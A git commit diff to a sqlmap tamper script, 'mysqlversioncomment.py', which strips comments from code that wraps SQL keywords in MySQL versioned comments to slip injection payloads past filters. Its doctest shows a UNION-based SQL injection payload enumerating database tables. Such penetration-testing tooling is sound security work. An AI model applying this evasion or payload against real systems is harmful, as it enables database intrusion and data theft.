Update mysqlversioncomment.py

2025-07-22 14:09:45 +03:00 · 2025-07-01 14:59:47 +08:00 · 2025-07-01 14:59:47 +08:00 · d09fe4e5b1
commit d09fe4e5b1
parent fe134d609f
1 changed files with 0 additions and 24 deletions
--- a/tamper/mysqlversioncomment.py
+++ b/tamper/mysqlversioncomment.py
@ -12,9 +12,6 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.NORMAL

 def dependencies():
-    """
-    This tamper script does not have any dependencies.
-    """
    pass

 def tamper(payload, **kwargs):
@ -36,12 +33,7 @@ def tamper(payload, **kwargs):
    >>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()")
    '1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/'
    """
-
-    # A comprehensive list of keywords and functions to be commented
-    # Using a dictionary to allow for specific replacements if needed,
-    # though here we use a generic replacement pattern.
    keywords = {
-        # DML & DDL
        "SELECT": "/*!50000SELECT*/",
        "UNION": "/*!50000UNION*/",
        "INSERT": "/*!50000INSERT*/",
@ -54,15 +46,11 @@ def tamper(payload, **kwargs):
        "LIMIT": "/*!50000LIMIT*/",
        "ALL": "/*!50000ALL*/",
        "DISTINCT": "/*!50000DISTINCT*/",
-
-        # Information Schema
        "INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/",
        "INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/",
        "TABLE_NAME": "/*!50000TABLE_NAME*/",
        "COLUMN_NAME": "/*!50000COLUMN_NAME*/",
        "TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/",
-
-        # Functions
        "CONCAT": "/*!50000CONCAT*/",
        "CONCAT_WS": "/*!50000CONCAT_WS*/",
        "GROUP_CONCAT": "/*!50000GROUP_CONCAT*/",
@ -74,8 +62,6 @@ def tamper(payload, **kwargs):
        "ORD": "/*!50000ORD*/",
        "BENCHMARK": "/*!50000BENCHMARK*/",
        "SLEEP": "/*!50000SLEEP*/",
-
-        # System Information Functions
        "DATABASE()": "/*!50000DATABASE()*/",
        "USER()": "/*!50000USER()*/",
        "SESSION_USER()": "/*!50000SESSION_USER()*/",
@ -83,8 +69,6 @@ def tamper(payload, **kwargs):
        "VERSION()": "/*!50000VERSION()*/",
        "@@VERSION": "/*!50000@@VERSION*/",
        "@@HOSTNAME": "/*!50000@@HOSTNAME*/",
-
-        # Other keywords
        "SEPARATOR": "/*!50000SEPARATOR*/",
        "HAVING": "/*!50000HAVING*/",
        "INTO": "/*!50000INTO*/",
@ -96,21 +80,13 @@ def tamper(payload, **kwargs):
    ret_val = payload

    if payload:
-        # Sort keywords by length, descending, to replace longer matches first (e.g., 'GROUP BY' before 'BY')
-        # This prevents partial replacements.
        sorted_keywords = sorted(keywords.keys(), key=len, reverse=True)

        for keyword in sorted_keywords:
-            # Use a regular expression with word boundaries (\b) to avoid replacing
-            # keywords that are part of other words (e.g., 'IN' in 'INFORMATION_SCHEMA').
-            # We handle functions with parentheses separately to avoid issues with word boundaries.
            if "()" in keyword:
-                # For functions, we need to escape the parentheses for regex
                regex_keyword = re.escape(keyword)
                ret_val = re.sub(r"(?i)\b%s\b" % regex_keyword, keywords[keyword], ret_val)
            else:
-                # For other keywords, use word boundaries
                ret_val = re.sub(r"(?i)\b%s\b" % re.escape(keyword), keywords[keyword], ret_val)

    return ret_val
-